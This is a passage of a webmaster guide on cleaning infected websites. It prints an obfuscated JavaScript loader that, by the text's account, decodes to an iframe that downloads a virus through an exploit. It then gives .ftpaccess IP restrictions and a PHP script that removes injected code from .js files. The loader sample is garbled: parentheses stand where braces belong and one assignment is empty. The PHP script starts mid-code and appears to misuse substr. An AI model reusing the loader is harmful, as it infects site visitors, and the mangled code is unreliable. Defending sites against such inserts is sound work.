    try ( q= document.createElement ("u" ) ; q.appendChild (q+ "" ) ; ) catch (qw) ( h=- 012/ 5 ; zz= "a" + "l" ; f= "fr" + "om" + "Ch" ; f+= "arC" ; ) try ( qwe= prototype ; ) catch (brebr) ( zz= "zv" .substr (123 - 122 ) + zz; ss= ; f+= (h ) ? "ode" : "" ; w= this ; e= w[ f.substr (11 ) + zz] ; n= "17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13 $55.5$54$51$13$27.5$13$26.5$3.5$2$59.5$17.5$17$17.5$26.5" [ ((e) ? "s" : "" ) + "p" + "lit" ] ("a$" .substr (1 ) ) ; for (i= 6 - 2 - 1 - 2 - 1 ; i- 684 != 0 ; i++ ) ( k= i; ss= ss+ String .fromCharCode (- 1 * h* (3 + 1 * n[ k] ) ) ; ) q= ss; e(q) ; )


    When the JavaScript runs, all this symbolic chaos turns into the easy-to-read HTML code of the iframe insert, which downloads the body of the virus to the site visitor through an exploit. Based on this minimum of theory, we will begin to protect ourselves from website infections.

    Setting up .ftpaccess - restricting FTP access to servers

    Viruses that rob your ftp passwords are so cunning that antiviruses are often powerless and passwords leak, no matter how hard you protect yourself. I propose to take a different path - and simply block access to your ftp. To allow FTP access only from certain IPs, place the .ftpaccess file with the contents in the root of your server or sites folder:

    <Limit ALL>
    Allow from xx.xx.xx.xx
    Allow from xx.xx.xx.xx
    Deny from all
    </Limit>

    Where xx.xx.xx.xx is your IP from which FTP activity is allowed, goodbye to everyone else.

    For a dedicated IP, call your provider!

    If you still cannot get a dedicated address, but have dynamic addresses, then you can specify the range of addresses from which IP addresses are issued by your Internet provider, for example it will look like this:

    <Limit ALL>
    Allow 212.32.5.0/26
    Allow 158.152.0.0/16
    Deny from all
    </Limit>

    This will limit hackers' access to your servers.

    Auto-removal script from all iframe insert files

    After the servers were protected, I started writing a script that could check the site for viruses and would go through all the hosting folders, checking the file formats I specified for the presence of iframes in the content. The result of the work was the following script, which removes malicious code inserts from site pages, in a specific example from .js scripts:

    $v) {
            $virus_text = $GLOBALS["virus_start"];
            $pos_start = stripos($v, $GLOBALS["virus_start"]);
            $pos_end = stripos($v, $GLOBALS["virus_end"]);
            $virus_text = substr($v, $pos_start, $pos_end);
            if ($virus_text != "") {
                if (!stristr($v, $virus_text)) {
                    // Clean line: keep it
                    $nfile[] = $v;
                } else {
                    // Line carries the insert: drop it and count the file once
                    if (!$flag) {
                        $flag = true;
                        if (in_array($ffile, $GLOBALS["skip_files"]))
                            echo " - skipped";
                        else {
                            echo " - infected";
                            $GLOBALS["num_infected"]++;
                        }
                    }
                }
            } else {
                $nfile[] = $v;
            }
        }
        // Rewrite the file from the kept lines only when deletion is enabled
        if ($GLOBALS["del"]) {
            $file = fopen($filename, "w");
            fwrite($file, implode("", $nfile));
            fclose($file);
        }
    }
    dir_walk("del_virus", $dir, array("js"), true, $dir);
    echo "Num infected = $num_infected ";
    ?>